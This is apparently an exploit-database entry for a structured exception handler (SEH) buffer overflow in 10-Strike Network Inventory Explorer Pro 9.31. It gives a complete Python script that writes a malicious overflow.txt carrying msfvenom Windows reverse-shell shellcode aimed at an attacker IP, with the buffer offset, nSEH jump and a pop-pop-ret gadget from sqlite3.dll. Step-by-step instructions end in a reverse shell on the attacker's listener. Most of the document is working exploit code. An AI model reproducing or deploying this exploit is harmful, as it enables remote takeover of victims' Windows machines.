10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)

2021-11-02
ID: 104915
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928 

# Proof of Concept:
# 1.Run python2 exploit.py to generate overflow.txt
# 2.Transfer overflow.txt to the Windows 10 machine
# 3.Setup Netcat listener on attacker machine 
# 4.Open 10-Strike Network Inventory Explorer Pro
# 5.Select Computers tab from the uppermost set of tabs
# 6.Select From Text File option
# 7.Open overflow.txt
# 8.Receive reverse shell connection on attacker machine! 

#!/usr/bin/env python
import struct

charslist = ""               
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]         

for i in range (0x00, 0xFF+1):
        if i not in badchars:   
                charslist += chr(i) 

#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")

#pattern_offset.rb -l 250 -q 41316841
offset = 213

#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))

#0x61e012f6 : pop edi # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)

#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode

buffer = junk + nseh + seh + subesp10 + payload

f = open("overflow.txt", "w")
f.write(buffer)
f.close()
1-4-2 (www01)